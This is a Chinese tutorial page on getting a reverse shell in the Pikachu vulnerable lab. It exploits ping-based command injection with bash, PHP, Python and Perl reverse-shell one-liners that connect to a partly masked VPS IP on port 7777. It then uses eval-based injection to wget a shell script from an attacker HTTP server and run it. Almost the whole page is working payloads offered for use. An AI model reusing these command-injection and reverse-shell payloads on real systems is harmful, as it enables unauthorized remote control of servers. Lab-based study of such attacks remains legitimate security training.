溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

怎么反彈shell

發(fā)布時(shí)間:2021-12-17 16:10:04 來源:億速云 閱讀:241 作者:iii 欄目:大數(shù)據(jù)

這篇文章主要講解了“怎么反彈shell”,文中的講解內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,下面請(qǐng)大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“怎么反彈shell”吧!

題目分析:
Pikachu的RCE處    

怎么反彈shell


whoami是www-data權(quán)限,很低的權(quán)限;

pwd可查看到當(dāng)前路徑且判定是linux系統(tǒng);

ls -al查看了下當(dāng)前目錄下的讀寫執(zhí)行權(quán)限:


怎么反彈shell


可以看出其他用戶是沒有高權(quán)限的,寫入執(zhí)行權(quán)限都沒有,就不能在當(dāng)前目錄下寫馬;經(jīng)嘗試,bash反彈shell未能成功。


第一題:exec "ping"


方法一:     /tmp寫入bash反彈腳本執(zhí)行

/tmp下有可寫可執(zhí)行權(quán)限,那么寫個(gè)bash反彈腳本上去:

127.0.0.1|Echo ‘bash -i >& /dev/tcp/47.107.x.xx/7777 0>&1’>/tmp/cdk.sh


Vps上先監(jiān)聽,然后bash執(zhí)行腳本:

127.0.0.1|bash /tmp/cdk.sh


怎么反彈shell


方法二:     php反彈shell

Payload:

127.0.0.1|php -r '$sock=fsockopen("47.107.xx.xxx",7777);exec("/bin/sh -i <&3 >&3 2>&3");'


怎么反彈shell


方法三:     python反彈shell

Payload: 

127.0.0.1|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.107.xx.xx",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


怎么反彈shell


方法四:     perl反彈shell

Payload1(依賴/bin/sh): 

127.0.0.1|perl -e 'use Socket;$i="47.107.xx.xx";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


怎么反彈shell


Payload2(不依賴/bin/sh):

127.0.0.1|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"47.107.xx.xx:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'


怎么反彈shell


第二題:exec "eval"


題目如圖:    

怎么反彈shell


自己服務(wù)器上寫個(gè)反彈shell的sh,利用wget下載到目標(biāo)服務(wù)器,避免傳輸過程發(fā)生格式問題。


怎么反彈shell


利用python啟用http服務(wù)。


怎么反彈shell


執(zhí)行命令:

system('wget -P /tmp/ http://180.76.xx.xx:8000/drinkwater.sh')
   


怎么反彈shell


執(zhí)行腳本,成功反彈shell:

system("bash /tmp/drinkwater.sh");


怎么反彈shell

感謝各位的閱讀,以上就是“怎么反彈shell”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對(duì)怎么反彈shell這一問題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是億速云,小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI